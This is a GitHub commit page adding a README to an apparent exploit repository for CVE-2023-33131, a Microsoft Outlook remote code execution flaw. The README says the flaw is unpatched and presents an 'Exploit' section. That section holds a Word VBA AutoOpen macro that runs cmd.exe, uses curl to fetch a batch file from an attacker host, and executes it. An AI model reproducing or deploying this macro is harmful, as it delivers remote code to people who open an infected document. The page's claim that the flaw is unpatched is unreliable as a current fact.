MattTheTekie/Windows11Exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update README.MD

Browse source
This commit is contained in:
nu11secur1ty 2023-07-07 15:06:18 +03:00 committed by GitHub
commit dc6babc68f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

27
2023/CVE-2023-33131/README.MD
View file

@ -1,3 +1,30 @@
## [CVE-2023-33131-Microsoft Outlook Remote Code Execution Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33131)
![](https://github.com/nu11secur1ty/Windows11Exploits/blob/main/2023/CVE-2023-33131/docs/Screenshot%202023-07-07%20144423.png)
## Description:
In this vulnerability, the Microsoft Outlook app allows an attacker to send an infected Word file with malicious content
to everyone who using the Outlook app, no matter web or local.
Microsoft still doesn't have a patch against this 0-day vulnerability today.
## Staus: HIGH Vulnerability
[+]Exploit:
- The malicious Word file:
```js
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)
## Time spend:
00:30:00